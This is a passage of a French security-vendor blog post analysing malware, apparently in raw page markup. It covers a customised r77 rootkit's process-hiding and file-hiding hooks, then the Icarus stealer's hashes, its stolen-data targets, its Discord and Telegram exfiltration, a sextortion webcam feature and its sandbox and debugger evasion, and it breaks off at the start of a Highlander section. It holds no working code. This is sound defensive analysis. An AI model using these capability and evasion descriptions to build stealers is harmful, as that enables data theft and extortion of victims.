:<\/p>\n<ul>\n<li>ZwQueryDirectoryFile est la fonction responsable de r\u00e9cup\u00e9rer les informations sur les fichiers contenus dans un r\u00e9pertoire. Ce hook est utilis\u00e9 ici pour dissimuler des fichiers ou dossiers et est plac\u00e9 uniquement dans la version 64 bits de la DLL.<\/li>\n<li>NtQuerySystemInformation permet entre autres de renvoyer des informations sur les processus en cours d'ex\u00e9cution, cette fonction est donc modifi\u00e9e pour dissimuler des processus.<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414142\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 19 : aper\u00e7u de la mise en place des hooks<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]Nous constatons la pr\u00e9sence de \"seulement\" deux hooks, alors que la version la plus r\u00e9cente de r77 sur le projet Github.com en compte une dizaine. Comme l'indiquent les chemins des fichiers de d\u00e9bogages trouv\u00e9s dans les fichiers DLL, il s'agit visiblement d'une version personnalis\u00e9e du rootkit\u00a0:<\/p>\n<ul>\n<li><code>F:\\r77-Custom-rootkit-masterVENOM\\x64\\Debug\\r77-x64.pdb<\/code><\/li>\n<li><code>F:\\r77-Custom-rootkit-masterVENOM\\Debug\\r77-x86.pdb<\/code><\/li>\n<li><code>F:\\r77-Custom-rootkit-masterVENOM\\Install\\obj\\Debug\\Install.pdb<\/code><\/li>\n<\/ul>\n<h3>Icarus<\/h3>\n<h4>Carte d'identit\u00e9 du stealer<\/h4>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_6\"\n     id='ninja_table_builder_414272'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_6\"\n     style=\"\n     max-height:900px;\n     max-width: 800px;margin-right: auto;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414272\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_6339902\" class=\"desktop-view tr_class_6339902 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_47180689\" rowspan=\"1\" colspan=\"1\" class=\"td_class_47180689\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_47180689\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Type of file<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_63752073\" rowspan=\"1\" colspan=\"1\" class=\"td_class_63752073\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_63752073\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">PE<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2992313\" class=\"desktop-view tr_class_2992313 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_85508872\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85508872\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85508872\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Language used<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_67647307\" rowspan=\"1\" colspan=\"1\" class=\"td_class_67647307\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_67647307\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">.NET<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7169041\" class=\"desktop-view tr_class_7169041 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_88081221\" rowspan=\"1\" colspan=\"1\" class=\"td_class_88081221\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_88081221\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Compilation date<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_23319849\" rowspan=\"1\" colspan=\"1\" class=\"td_class_23319849\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_23319849\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Sun Nov 27 01:42:33 2022<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_3651020\" class=\"desktop-view tr_class_3651020 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_90964305\" rowspan=\"1\" colspan=\"1\" class=\"td_class_90964305\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_90964305\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Obfuscation<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_85405762\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85405762\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85405762\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">No<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_6471413\" class=\"desktop-view tr_class_6471413 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_22731821\" rowspan=\"1\" colspan=\"1\" class=\"td_class_22731821\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_22731821\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">md5<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_27089268\" rowspan=\"1\" colspan=\"1\" class=\"td_class_27089268\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_27089268\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">712871412b0da86d7bc1f1601e1fa212<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2624678\" class=\"desktop-view tr_class_2624678 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_74398198\" rowspan=\"1\" colspan=\"1\" class=\"td_class_74398198\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_74398198\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha1<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_81484118\" rowspan=\"1\" colspan=\"1\" class=\"td_class_81484118\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_81484118\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">14a59ee663cd6ff1b816a62e2078aa434cdf1da5<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8844292\" class=\"desktop-view tr_class_8844292 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_36997657\" rowspan=\"1\" colspan=\"1\" class=\"td_class_36997657\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_36997657\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha256<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_66951413\" rowspan=\"1\" colspan=\"1\" class=\"td_class_66951413\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_66951413\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">6b4ea42c1de9777847d7b6f980976310abe46d2de9792045a6eba54b032b8520<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_9388197\" class=\"desktop-view tr_class_9388197 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_97969899\" rowspan=\"1\" colspan=\"1\" class=\"td_class_97969899\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_97969899\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">ssdeep<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_61574672\" rowspan=\"1\" colspan=\"1\" class=\"td_class_61574672\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_61574672\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">49152:BNNm\/5XhG34AiROEw+W7SCmnVQjkQxBA8hA:nU11lw\/CFyA<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h4>Pr\u00e9sentation du stealer<\/h4>\n<p>Icarus.exe est un stealer, proche fonctionnellement de StormKitty ou Prynt Stealer pr\u00e9c\u00e9demment abord\u00e9s, qui collecte de nombreuses informations :<\/p>\n<ul>\n<li>donn\u00e9es bancaires\u00a0;<\/li>\n<li>cryptomonnaies\u00a0;<\/li>\n<li>donn\u00e9es de navigation (historique, cookies, mots de passe, t\u00e9l\u00e9chargements) pour les principaux navigateurs : Edge, Firefox, Chrome \/ Chromium\u00a0;<\/li>\n<li>comptes de jeux vid\u00e9os : Steam, Battlenet, Uplay, Minecraft\u00a0;<\/li>\n<li>donn\u00e9es de messageries : Discord, Element, Icq, Outlook, Pidgin, Signal, Skype, Telegram, Tox\u00a0;<\/li>\n<li>donn\u00e9es syst\u00e8me : applications install\u00e9es, cl\u00e9 de licence Windows, informations syst\u00e8me\u00a0;<\/li>\n<li>codes wifi enregistr\u00e9s\u00a0;<\/li>\n<li>captures d'\u00e9crans\u00a0;<\/li>\n<li>frappes clavier\u00a0;<\/li>\n<li>acc\u00e8s VPNs (ProtonVPN, OpenVPN, NordVPN)\u00a0;<\/li>\n<li>vol de fichiers selon leurs extensions.<\/li>\n<\/ul>\n<p>Lors de la construction du sample, il est possible de s\u00e9lectionner quels fichiers ou donn\u00e9es doivent \u00eatre collect\u00e9s. Cette configuration est ensuite enregistr\u00e9e dans le binaire.<\/p>\n<p>Dans le cas pr\u00e9cis de ce sample, les extensions de fichiers renseign\u00e9es correspondent \u00e0 des fichiers classiques : documents Microsoft Office, base de donn\u00e9es de mots de passe, mais aussi plus sp\u00e9cifiques \u00e0 certains secteurs tels que des fichiers de code source ou de bases de donn\u00e9es m\u00e9tier. Le spectre d'utilisation est donc tr\u00e8s large, il vise aussi bien les particuliers que les entreprises.<\/p>\n<p>Une fonctionnalit\u00e9 \"<em>PornService<\/em>\" permet m\u00eame de r\u00e9aliser des captures d'\u00e9cran et de webcam simultan\u00e9ment lorsque certains mots-cl\u00e9s sont rep\u00e9r\u00e9s par le keylogger. Pas besoin de lister les mots-cl\u00e9s pour faire comprendre que l\u2019objectif final est la <a href=\"https:\/\/www.stormshield.com\/fr\/actus\/sextorsion-et-cyberattaques-vers-un-marketing-de-la-honte\/\">sextorsion<\/a>.<\/p>\n<p>Ces donn\u00e9es sont ensuite exfiltr\u00e9es via diff\u00e9rents canaux : chats Discord, sites de partage de fichiers (gofile, anonfile) ou encore canaux Telegram.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414147\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 20 : code du formatage des donn\u00e9es avant l'envoi sur Discord par le stealer Icarus<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h4>M\u00e9canismes d\u2019autoprotection du stealer<\/h4>\n<p>Ce binaire contient plusieurs moyens de se prot\u00e9ger contre des d\u00e9tections par des produits de s\u00e9curit\u00e9 :<\/p>\n<ul>\n<li>l'autodestruction d\u00e9clench\u00e9e par exemple si le serveur discord n'est pas joignable\u00a0;<\/li>\n<li>la d\u00e9tection de sandbox et de machine virtuelle\u00a0;<\/li>\n<li>la d\u00e9tection de d\u00e9bogage\u00a0;<\/li>\n<li>la d\u00e9tection parmi les processus lanc\u00e9s si certains sont des outils habituellement utilis\u00e9s par les analystes.<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414152\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 21 : code de blacklist de logiciels de s\u00e9curit\u00e9 par le stealer Icarus<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h4>Origine probable du stealer<\/h4>\n<p>Renomm\u00e9 Icarus dans les samples trouv\u00e9s, le chemin de PDB se trouvant dans le binaire indique qu'il s'agit de Stealerium ou d'une variante, disponible en open source (github.com\/Stealerium\/Stealerium)\u00a0:<\/p>\n<p><code>H:\\HVNCICARUS\\Icarus\\Icarus - Nocrypt\\HVNC Source\\Stealerium-Build_2022.06.08_22-08\\Stub\\obj\\Debug\\Icarus.pdb<\/code><\/p>\n<p>Ci-dessous, une comparaison entre du code du sample d\u00e9compil\u00e9 et le code pr\u00e9sent sur le d\u00e9p\u00f4t de Stealerium o\u00f9 on peut noter une forte ressemblance\u00a0:[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414157\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 22 : comparaison des codes entre le sample Icarus et le d\u00e9p\u00f4t de Stealerium <\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h3>Highlander<\/h3>\n<h4>Carte d'identit\u00e9<\/h4>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_7\"\n     id='ninja_table_builder_414271'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_7\"\n     style=\"\n     max-height:900px;\n     max-width: 1160px;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414271\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_6339902\" class=\"desktop-view tr_class_6339902 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_47180689\" rowspan=\"1\" colspan=\"1\" class=\"td_class_47180689\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_47180689\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Type of file<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_63752073\" rowspan=\"1\" colspan=\"1\" class=\"td_class_63752073\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_63752073\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">PE<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2992313\" class=\"desktop-view tr_class_2992313 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_85508872\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85508872\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85508872\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Language used<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_67647307\" rowspan=\"1\" colspan=\"1\" class=\"td_class_67647307\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_67647307\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">.NET<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7169041\" class=\"desktop-view tr_class_7169041 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_88081221\" rowspan=\"1\" colspan=\"1\" class=\"td_class_88081221\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_88081221\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Compilation date<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_23319849\" rowspan=\"1\" colspan=\"1\" class=\"td_class_23319849\" style=\"padding: 10px; max-width: 200px; min-width: 200px; 